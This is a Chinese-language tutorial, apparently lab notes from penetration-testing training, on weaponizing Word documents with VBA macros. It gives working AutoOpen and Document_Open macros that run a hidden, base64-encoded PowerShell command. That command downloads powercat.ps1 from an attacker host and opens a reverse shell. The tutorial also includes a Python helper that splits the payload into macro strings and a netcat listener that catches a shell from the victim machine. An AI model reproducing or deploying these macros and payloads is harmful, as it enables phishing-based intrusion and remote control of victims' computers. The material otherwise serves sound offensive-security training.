采用宏的方式对client-side攻击是一种非常老的攻击方式，其目的是将宏嵌入到Word或Excle中，当用户打开嵌入宏的文档时可反弹shell。自Office 2016开始，Microsoft就默认关闭了宏的功能，当用户打开嵌入宏的文档时，需要手动确认并打开宏，才能继续使用该功能。尽管如此，采用宏的方式对client-side的攻击仍然非常流行，因为当前仍然存在大量旧版本的Office users，以及通过钓鱼诱导的方式，仍然可以诱导users点击并启用宏。以下是制作恶意宏文档的演示过程和client-side遭受攻击的过程。

首先在Attack user端创建一个空白的Word文档，并保存为doc格式。因为新的docx格式文档无法在不附加包含模板的情况下保存宏。也就是说，docx文件可以运行宏，但不能嵌入或保存宏。

  在宏的编辑页面可以看到code编写窗口。在VBA宏中，通常是以Sub为开始，End Sub为结束。

在本次演示中，我们将利用ActiveX对象，它将提供对底层操作系统的命令访问。同时还可以通过Windows Script Host Shell对象使用WScript来实现。

当我们使用CreateObject实例化了一个Windows Script Host Shell对象后，我们就可以调用Wscript.Shell中的Run方法，这样就可以在目标客户端机器上启动应用程序。因此，我们可以在第一个宏中启动PowerShell窗口。

Sub TestMacro()
  CreateObject("Wscript.Shell").Run "powershell"  End Sub

Sub AutoOpen()
  TestMacro  End Sub
Sub Document_Open()
  TestMacro  End Sub
Sub TestMacro()
  CreateObject("Wscript.Shell").Run "powershell"  End Sub

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.204/powercat.ps1');powercat -c 192.168.45.204 -p 4444 -e powershell

Sub AutoOpen()    TestMacroEnd Sub
Sub Document_Open()    TestMacroEnd Sub
Sub TestMacro()    Dim Str As String    CreateObject("Wscript.Shell").Run StrEnd Sub

┌──(root㉿kali)-[/home/kali]└─# pwsh                  PowerShell 7.2.6Copyright (c) Microsoft Corporation.
https://aka.ms/powershellType 'help' to get help.
PS /home/kali> $Text = 'IEX(New-Object System.Net.WebClient).DownloadString("http://192.168.45.204/powercat.ps1");powercat -c 192.168.45.204 -p 4444 -e powershell'                                                                                                   PS /home/kali> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)PS /home/kali> $EncodedText =[Convert]::ToBase64String($Bytes)PS /home/kali> $EncodedTextSQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA0AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAIgApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA0ACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA

#!/usr/bin/pythonstr = "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA0AC8AcABvAHcAZQByAGMAYQB0AC4AcABzADEAIgApADsAcABvAHcAZQByAGMAYQB0ACAALQBjACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA0ACAALQBwACAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwA"
n = 50
for i in range(0, len(str), n):print("Str = Str + " + '"' + str[i:i+n] + '"')

Sub AutoOpen()    TestMacroEnd Sub
Sub Document_Open()    TestMacroEnd Sub
Sub TestMacro()    Dim Str As StringStr = Str + "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAd"Str = Str + "wAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAA"Str = Str + "uAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA"Str = Str + "GQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA5ADI"Str = Str + "ALgAxADYAOAAuADQANQAuADIAMAA0AC8AcABvAHcAZQByAGMAY"Str = Str + "QB0AC4AcABzADEAIgApADsAcABvAHcAZQByAGMAYQB0ACAALQB"Str = Str + "jACAAMQA5ADIALgAxADYAOAAuADQANQAuADIAMAA0ACAALQBwA"Str = Str + "CAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGw"Str = Str + "A"    CreateObject("Wscript.Shell").Run StrEnd Sub

[email protected]:~$ nc -nvlp 4444listening on [any] 4444 ...connect to [192.168.45.204] from (UNKNOWN) [192.168.204.196] 49768Windows PowerShellCopyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindowsPS C:\Users\offsec\Documents>